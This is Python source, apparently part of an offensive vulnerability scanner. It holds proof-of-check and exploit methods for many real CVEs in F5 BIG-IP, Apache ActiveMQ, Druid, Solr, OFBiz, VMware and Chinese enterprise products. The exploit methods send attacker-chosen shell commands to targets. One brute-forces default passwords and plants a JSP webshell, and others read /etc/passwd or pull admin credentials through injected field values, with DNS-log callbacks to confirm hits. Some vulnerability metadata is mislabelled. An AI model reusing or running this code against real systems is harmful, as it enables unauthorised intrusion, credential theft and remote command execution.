def cve_2021_22986_exp(self, cmd):
vul_name = "F5 BIG-IP: CVE-2021-22986"
headers = {
'User-Agent': self.ua,
'Accept': '*/*',
'Connection': 'close',
'Authorization': 'Basic YWRtaW46',
'X-F5-Auth-Token': '',
'Content-Type': 'application/json'
}
data = r'''{"command": "run", "utilCmdArgs": "-c 'RECOMMAND'"}'''.replace(
"RECOMMAND", cmd)
url = urljoin(self.url, "/mgmt/tm/util/bash")
try:
request = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
r = json.loads(request.text)["commandResult"]
self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
verify.exploit_print(r, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception as e:
verify.error_print(vul_name)
def cve_2016_3088_exp(self, cmd):
self.threadLock.acquire()
vul_name = "Apache AcitveMQ: CVE-2016-3088"
self.path = "null"
self.name = random_md5()
self.webshell = "/" + self.name + ".jsp"
self.exp = self.jsp_webshell
self.passlist = [
"admin:123456", "admin:admin", "admin:123123", "admin:activemq",
"admin:12345678"
]
try:
for self.pa in self.passlist:
self.base64_p = base64.b64encode(str.encode(self.pa))
self.p = self.base64_p.decode('utf-8')
self.headers_base64 = {
'User-Agent': self.ua,
'Authorization': 'Basic ' + self.p
}
url = urljoin(self.url, "/admin/test/systemProperties.jsp")
self.request = requests.get(url,
headers=self.headers_base64,
timeout=self.timeout,
verify=False)
if self.request.status_code == 200:
self.path = \
re.findall('<td class="label">activemq.home</td>.*?<td>(.*?)</td>', self.request.text, re.S)[0]
break
self.request = requests.put(self.url + "/fileserver/v.txt",
headers=self.headers_base64,
data=self.exp,
timeout=self.timeout,
verify=False)
self.headers_move = {
'User-Agent':
self.ua,
'Destination':
'file://' + self.path + '/webapps/api' + self.webshell
}
self.request = requests.request("MOVE",
self.url + "/fileserver/v.txt",
headers=self.headers_move,
timeout=self.timeout,
verify=False)
self.raw_data = dump.dump_all(self.request).decode(
'utf-8', 'ignore')
self.request = requests.get(self.url + "/api" + self.webshell +
"?pwd=password&cmd=" + cmd,
headers=self.headers_base64,
timeout=self.timeout,
verify=False)
self.r = "[webshell: " + self.url + "/api" + self.webshell + "?pwd=password&cmd=" + cmd + " ]\n"
self.r += self.request.text
verify.exploit_print(self.r, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def cve_2021_25646_exp(self, cmd):
vul_name = "Apache Druid: CVE-2021-25646"
url = urljoin(self.url, "/druid/indexer/v1/sampler")
headers = {
'Content-Type': 'application/json',
'User-Agent': self.ua,
'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2',
'Connection': 'keep-alive'
}
data = self.payload_cve_2021_25646.replace("RECOMMAND", cmd)
try:
request = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
r = "Command Executed Successfully (But No Echo)"
raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
verify.exploit_print(r, raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def cve_2021_22986_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "F5 BIG-IP: CVE-2021-22986"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "F5 BIG-IP Remote Code Execution"
self.vul_info["vul_numb"] = "CVE-2021-22986"
self.vul_info["vul_apps"] = "Flink"
self.vul_info["vul_date"] = "2021-03-11"
self.vul_info["vul_vers"] = "< 16.0.1"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "Remote Code Execution"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "BIG-IP存在代码执行漏洞,该漏洞允许定义身份验证的攻击者通过BIG-IP" \
"管理界面和自身IP地址对iControl REST接口进行网络访问,以执行任意系统命令," \
"创建或删除文件以及替换服务。该中断只能通过控制界面利用,而不能通过数据界面利用。"
self.vul_info["cre_date"] = "2021-03-20"
self.vul_info["cre_auth"] = "zhzyker"
headers = {
'User-Agent': self.ua,
'Accept': '*/*',
'Connection': 'close',
'Authorization': 'Basic YWRtaW46',
'X-F5-Auth-Token': '',
'Content-Type': 'application/json'
}
md = random_md5()
cmd = "echo " + md
data = r'''{"command": "run", "utilCmdArgs": "-c 'RECOMMAND'"}'''.replace(
"RECOMMAND", cmd)
url = urljoin(self.url, "/mgmt/tm/util/bash")
try:
request = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
r = json.loads(request.text)["commandResult"]
if request.status_code == 200:
if md in misinformation(r, md):
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
self.vul_info["vul_payd"] = data
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def time_2021_0410_exp(self, cmd):
vul_name = "QiAnXin NS-NGFW: time-2021-0410"
url = urljoin(self.url, "/directdata/direct/router")
md = random_md5()
data = {
"action":
"SSLVPN_Resource",
"method":
"deleteImage",
"data": [{
"data": [
"/var/www/html/d.txt;" + cmd + " > /var/www/html/" + md +
".txt"
]
}],
"type":
"rpc",
"tid":
17
}
data = json.dumps(data)
try:
request = requests.post(url,
data=data,
headers=self.headers,
timeout=self.timeout,
verify=False)
url = urljoin(self.url, md + ".txt")
req = requests.get(url,
data="1",
headers=self.headers,
timeout=self.timeout,
verify=False)
self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
verify.exploit_print(req.text, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def cve_2021_27905_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Apache Solr: CVE-2021-27905"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "Apache Solr Replication handler SSRF"
self.vul_info["vul_numb"] = "CVE-2021-27905"
self.vul_info["vul_apps"] = "Solr"
self.vul_info["vul_date"] = "2021-04-14"
self.vul_info["vul_vers"] = "7.0.0-7.7.3, 8.0.0-8.8.1"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "SSRF"
self.vul_info["vul_data"] = "null"
self.vul_info[
"vul_desc"] = "Apache Solr是一个开源搜索服务引擎,Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。漏洞产生在 ReplicationHandler 中的 masterUrl 参数( leaderUrl 参数)可指派另一个 Solr 核心上的 ReplicationHandler 讲索引数据复制到本地核心上。成功利用此漏洞可造成服务端请求伪造漏洞。"
self.vul_info["cre_auth"] = "zhzyker"
core_name = None
dns = dns_request()
url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
try:
request = requests.get(url_core,
headers=self.headers,
timeout=self.timeout,
verify=False)
try:
core_name = list(json.loads(request.text)["status"])[0]
except:
pass
payload = "/solr/re_core_name/replication?command=fetchindex&masterUrl" \
"=http://re_dns_domain/&wt=json&httpBasicAuthUser="******"&httpBasicAuthPassword="******"re_core_name", core_name).replace("re_dns_domain", dns)
url_ssrf = urljoin(self.url, payload)
r = requests.get(url_ssrf,
headers=self.headers,
timeout=self.timeout,
verify=False)
if dns in dns_result(dns):
self.vul_info["vul_payd"] = url_ssrf
self.vul_info["vul_data"] = dump.dump_all(r).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info[
"prt_info"] = "[ssrf] [dns] [corename: " + self.url + "/solr/" + core_name + " ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def time_2021_0515_poc(self):
self.threadLock.acquire()
self.vul_info[
"prt_name"] = "E-cology OA WorkflowServiceXml RCE: time-2021-0515"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "E-cology OA WorkflowServiceXml RCE"
self.vul_info["vul_numb"] = "time-2021-0415"
self.vul_info["vul_apps"] = "E-cology"
self.vul_info["vul_date"] = "2021-05-15"
self.vul_info["vul_vers"] = "E-cology <= 9.0"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "RCE"
self.vul_info["vul_data"] = "null"
self.vul_info[
"vul_desc"] = "The WorkflowServiceXml interface can be accessed without authorization. The attacker can call this interface to construct a specific HTTP request to bypass the security restrictions of E-cology itself to achieve remote command execution."
self.vul_info["cre_date"] = "2021-05-19"
self.vul_info["cre_auth"] = "zhzyker"
url = urljoin(self.url, "/services%20/WorkflowServiceXml")
md = random_md5()
cmd = "echo " + md
headers = {
'User-Agent': self.ua,
'SOAPAction': '""',
'cmd': cmd,
"Content-Type": "text/xml;charset=UTF-8"
}
data = self.payload_time_2021_0515
try:
request = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
#print(self.url + " " + str(request.status_code) + request.text)
if md in misinformation(request.text,
md) and request.status_code == 500:
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = data
self.vul_info["prt_info"] = "[rce: " + url + " ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2021_25646_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Apache Druid: CVE-2021-25646"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "Apache Druid 远程代码执行漏洞"
self.vul_info["vul_numb"] = "CVE-2021-25646"
self.vul_info["vul_apps"] = "Druid"
self.vul_info["vul_date"] = "2021-02-01"
self.vul_info["vul_vers"] = "< 0.20.1"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行漏洞"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。" \
"此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中," \
"经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。" \
"攻击者可直接构造恶意请求执行任意代码,控制服务器。"
self.vul_info["cre_date"] = "2021-02-03"
self.vul_info["cre_auth"] = "zhzyker"
url = urljoin(self.url, "/druid/indexer/v1/sampler")
headers = {
'Content-Type': 'application/json',
'User-Agent': self.ua,
'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2',
'Connection': 'keep-alive'
}
md = dns_request()
cmd = "ping " + md
data = self.payload_cve_2021_25646.replace("RECOMMAND", cmd)
try:
request = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
if dns_result(md):
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
self.vul_info["vul_payd"] = data
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["prt_info"] = "[dns] [rce] [cmd: " + cmd + "]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cnvd_2021_26422_exp(self, cmd):
vul_name = "Eyou Email System: CNVD-2021-26422"
url = urljoin(self.url, "/webadm/?q=moni_detail.do&action=gragh")
payload = "type='|" + cmd + "||'"
try:
request = requests.post(url, data=payload, headers=self.headers, timeout=self.timeout, verify=False)
self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
verify.exploit_print(request.text, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def time_2021_0424_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Ruijie-EG Easy Gateway: time-2021-0424"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "Get account password, background rce"
self.vul_info["vul_numb"] = "time-2021-0415"
self.vul_info["vul_apps"] = "RuiJie"
self.vul_info["vul_date"] = "2021-04-24"
self.vul_info["vul_vers"] = "unknow"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "RCE"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "Get account password, background rce"
self.vul_info["cre_date"] = "2021-04-26"
self.vul_info["cre_auth"] = "zhzyker"
url = urljoin(self.url, "/login.php")
payload = "username=admin&password=admin?show+webmaster+user"
try:
request = requests.post(url, data=payload, headers=self.headers, timeout=self.timeout, verify=False)
res = json.loads(request.text)["data"]
get_user = re.search('admin', res)
if get_user:
if r"01. " in res:
user = re.findall("00. (.*?) ", res)[0]
pasd = re.findall(r"admin (.*)\r\r", res)[0]
else:
user = re.findall("00. (.*?) ", res)[0]
pasd = re.findall(r"admin (.*)", res)[0]
if user and pasd:
self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = payload
self.vul_info["prt_info"] = "[username:"******"] [password:"******"]"
elif user:
self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = payload
self.vul_info["prt_info"] = "[user&pass:"******"]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2021_21975_poc(self):
self.threadLock.acquire()
self.vul_info[
"prt_name"] = "VMware vRealize Operations Manager: CVE-2021-21975"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info[
"vul_name"] = "VMware vRealize Operations Manager API SSRF"
self.vul_info["vul_numb"] = "CVE-2021-21972"
self.vul_info["vul_apps"] = "Vmware"
self.vul_info["vul_date"] = "2021-03-31"
self.vul_info["vul_vers"] = "<= 8.3.0"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "SSRF"
self.vul_info["vul_data"] = "null"
self.vul_info[
"vul_desc"] = "攻击者通过访问vRealize Operations Manager API传递特定的参数到服务器端进行请求伪造攻击"
self.vul_info["cre_date"] = "2021-04-01"
self.vul_info["cre_auth"] = "zhzyker"
try:
headers = {
"User-Agent": self.ua,
"Content-Type": "application/json;charset=UTF-8"
}
dns = dns_request()
data = '["' + dns + '"]'
url = urljoin(self.url, "/casa/nodes/thumbprints")
res = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
if dns_result(dns):
self.vul_info["vul_data"] = dump.dump_all(res).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = data
self.vul_info["prt_info"] = "[ssrf] [dns:" + dns + " ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2020_5902_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "F5 BIG-IP: CVE-2020-5902"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "F5 BIG-IP Remote Code Execution"
self.vul_info["vul_numb"] = "CVE-2020-5902"
self.vul_info["vul_apps"] = "Flink"
self.vul_info["vul_date"] = "2020-07-15"
self.vul_info["vul_vers"] = "< 11.6.x"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "Remote Code Execution"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "The Traffic Management User Interface (TMUI), also referred to as the " \
"Configuration utility, has a Remote Code Execution (RCE) vulnerability in " \
"undisclosed pages. (CVE-2020-5902)"
self.vul_info["cre_date"] = "2021-03-20"
self.vul_info["cre_auth"] = "zhzyker"
url = urljoin(
self.url,
"/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=CVE-2020-5902")
try:
request = requests.get(url,
headers=self.headers,
timeout=self.timeout,
verify=False)
if request.status_code == 200 and r"CVE-2020-5902" in request.text:
url = self.url + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
request = requests.get(url,
headers=self.headers,
timeout=self.timeout,
verify=False)
if r"root:x:0:0:" in request.text and r"daemon:x:" in request.text and r"nologin" in request.text:
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
self.vul_info["vul_payd"] = url
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["prt_info"] = "[rce] [url:" + url + " ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2020_5902_exp(self, cmd):
vul_name = "F5 BIG-IP: CVE-2020-5902"
url = urljoin(
self.url,
"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName="
+ cmd)
try:
request = requests.get(url,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
verify.exploit_print(request.text, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception as e:
verify.error_print(vul_name)
def time_2021_0414_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "CoreMail: time-2021-0414"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info[
"vul_name"] = "Coremail configuration information disclosure vulnerability"
self.vul_info["vul_numb"] = "time-2021-0414"
self.vul_info["vul_apps"] = "CoreMail"
self.vul_info["vul_date"] = "2021-04-19"
self.vul_info["vul_vers"] = "unknow"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "RCE"
self.vul_info["vul_data"] = "null"
self.vul_info[
"vul_desc"] = "Coremail configuration information disclosure vulnerability"
self.vul_info["cre_date"] = "2021-04-29"
self.vul_info["cre_auth"] = "zhzyker"
url = urljoin(self.url, "/mailsms/s?func=ADMIN:appState&dumpConfig=/")
try:
request = requests.get(url,
headers=self.headers,
timeout=self.timeout,
verify=False)
if request.status_code == 200:
if r"FS_IP_NOT_PERMITTED" not in request.text and r"/home/coremail" in request.text:
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info[
"vul_payd"] = "/mailsms/s?func=ADMIN:appState&dumpConfig=/"
self.vul_info["prt_info"] = "[url:" + url + " ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2021_26295_exp(self, cmd):
vul_name = "Apache OFBiz: CVE-2021-26295"
headers = {
'User-Agent': self.ua,
'Content-Type': 'text/xml',
'Connection': 'close'
}
def _trans(s):
return "%s" % ''.join('%.2x' % x for x in s)
try:
dns_data = bytes(cmd, encoding="utf8")
dns_hex = _trans(dns_data)
data = self.payload_cve_2021_26295_exp_1.replace(
"RECOMMAND", dns_hex)
url = urljoin(self.url, "/webtools/control/SOAPService")
request = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
if r"cus-obj" in request.text:
data = self.payload_cve_2021_26295_exp_2.replace(
"RECOMMAND", dns_hex)
request = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
if request.status_code == 200:
r = "Command Executed Successfully (But No Echo)"
else:
r = "Command Executed Failed... ..."
verify.exploit_print(r, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception as e:
verify.error_print(vul_name)
def cnvd_2021_26422_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Eyou Email System: CNVD-2021-26422"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "Eyou email system has remote command execution"
self.vul_info["vul_numb"] = "CNVD-2021-26422"
self.vul_info["vul_apps"] = "Eyou"
self.vul_info["vul_date"] = "2021-04-19"
self.vul_info["vul_vers"] = "unknow"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "RCE"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "Eyou email system has remote command execution"
self.vul_info["cre_date"] = "2021-04-29"
self.vul_info["cre_auth"] = "zhzyker"
url = urljoin(self.url, "/webadm/?q=moni_detail.do&action=gragh")
md = random_md5()
cmd = "echo " + md
payload = "type='|" + cmd + "||'"
try:
request = requests.post(url, data=payload, headers=self.headers, timeout=self.timeout, verify=False)
if md in misinformation(request.text, md):
self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = payload
self.vul_info["prt_info"] = "[cmd:" + cmd + "]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def time_2021_0515_exp(self, cmd):
vul_name = "E-cology OA WorkflowServiceXml RCE: time-2021-0515"
url = urljoin(self.url, "/services%20/WorkflowServiceXml")
headers = {
'User-Agent': self.ua,
'SOAPAction': '""',
'cmd': cmd,
"Content-Type": "text/xml;charset=UTF-8"
}
data = self.payload_time_2021_0515
try:
request = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
verify.exploit_print(request.text, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def time_2021_0410_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "QiAnXin NS-NGFW: time-2021-0410"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info[
"vul_name"] = "Qianxin NS-NGFW Netkang Next Generation Firewall Front RCE"
self.vul_info["vul_numb"] = "time-2021-0415"
self.vul_info["vul_apps"] = "QiAnXin"
self.vul_info["vul_date"] = "2021-04-10"
self.vul_info["vul_vers"] = "unknow"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "RCE"
self.vul_info["vul_data"] = "null"
self.vul_info[
"vul_desc"] = "Qianxin NS-NGFW Netkang Next Generation Firewall Front RCE"
self.vul_info["cre_date"] = "2021-04-16"
self.vul_info["cre_auth"] = "zhzyker"
url = urljoin(self.url, "/directdata/direct/router")
md = random_md5()
cmd = "echo " + md
data = {
"action":
"SSLVPN_Resource",
"method":
"deleteImage",
"data": [{
"data": [
"/var/www/html/d.txt;" + cmd + " > /var/www/html/" + md +
".txt"
]
}],
"type":
"rpc",
"tid":
17
}
data = json.dumps(data)
try:
request = requests.post(url,
data=data,
headers=self.headers,
timeout=self.timeout,
verify=False)
url = urljoin(self.url, md + ".txt")
req = requests.get(url,
data="1",
headers=self.headers,
timeout=self.timeout,
verify=False)
if md in misinformation(req.text, md) and (
md + ".txt") not in req.text and req.status_code == 200:
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = data
self.vul_info["prt_info"] = "[rce:" + url + " ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2021_26295_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Apache OFBiz: CVE-2021-26295"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info[
"vul_name"] = "Apache OFBiz RMI deserializes arbitrary code execution"
self.vul_info["vul_numb"] = "CVE-2021-26295"
self.vul_info["vul_apps"] = "Flink"
self.vul_info["vul_date"] = "2021-03-25"
self.vul_info["vul_vers"] = "< 17.12.06"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "Arbitrary Code Execution"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "Apache OFBiz官方发布安全更新,修复了一处由RMI反序列化造成的远程代码执行漏洞。" \
"攻击者可构造恶意请求,触发反序列化,从而造成任意代码执行,控制服务器."
self.vul_info["cre_date"] = "2021-03-31"
self.vul_info["cre_auth"] = "zhzyker"
headers = {
'User-Agent': self.ua,
'Content-Type': 'text/xml',
'Connection': 'close'
}
def _trans(s):
return "%s" % ''.join('%.2x' % x for x in s)
def dnslog_re(md):
headers_dnslog = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3970.5 Safari/537.36',
'Host': 'www.dnslog.cn',
'Cookie':
'UM_distinctid=1703200149e449-053d4e8089c385-741a3944-1fa400-1703200149f80a; PHPSESSID=jfhfaj7op8u8i5sif6d4ai30j4; CNZZDATA1278305074=1095383570-1581386830-null%7C1581390548',
'Accept': '*/*',
'Referer': 'http://www.dnslog.cn/',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Connection': 'close'
}
dnslog_url = "http://www.dnslog.cn/getrecords.php?t=0.913020034617231"
dns = requests.get(dnslog_url,
headers=headers_dnslog,
timeout=10,
verify=False)
if md in dns.text:
return md
try:
headers_dnslog = {
'User-Agent':
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
'Host': 'www.dnslog.cn',
'Cookie':
'UM_distinctid=1703200149e449-053d4e8089c385-741a3944-1fa400-1703200149f80a; PHPSESSID=jfhfaj7op8u8i5sif6d4ai30j4; CNZZDATA1278305074=1095383570-1581386830-null%7C1581390548',
'Accept': '*/*',
'Referer': 'http://www.dnslog.cn/',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Connection': 'close'
}
dnslog_api = "http://www.dnslog.cn/getdomain.php?t=0.08025501698741366"
dns = requests.post(dnslog_api,
headers=headers_dnslog,
timeout=10,
verify=False)
dns = dns.text
dns_data = bytes(dns, encoding="utf8")
dns_hex = _trans(dns_data)
data = self.payload_cve_2021_26295_poc.replace(
"RECOMMAND", dns_hex)
url = urljoin(self.url, "/webtools/control/SOAPService")
request = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
if dnslog_re(dns):
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
self.vul_info["vul_payd"] = data
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["prt_info"] = "[dns] [rmi:" + dns + "]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def time_2020_1013_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Vmware vCenter: time-2020-10-13 (not cve)"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "Vmware vCenter 任意文件读取"
self.vul_info["vul_numb"] = "time-2020-10-13"
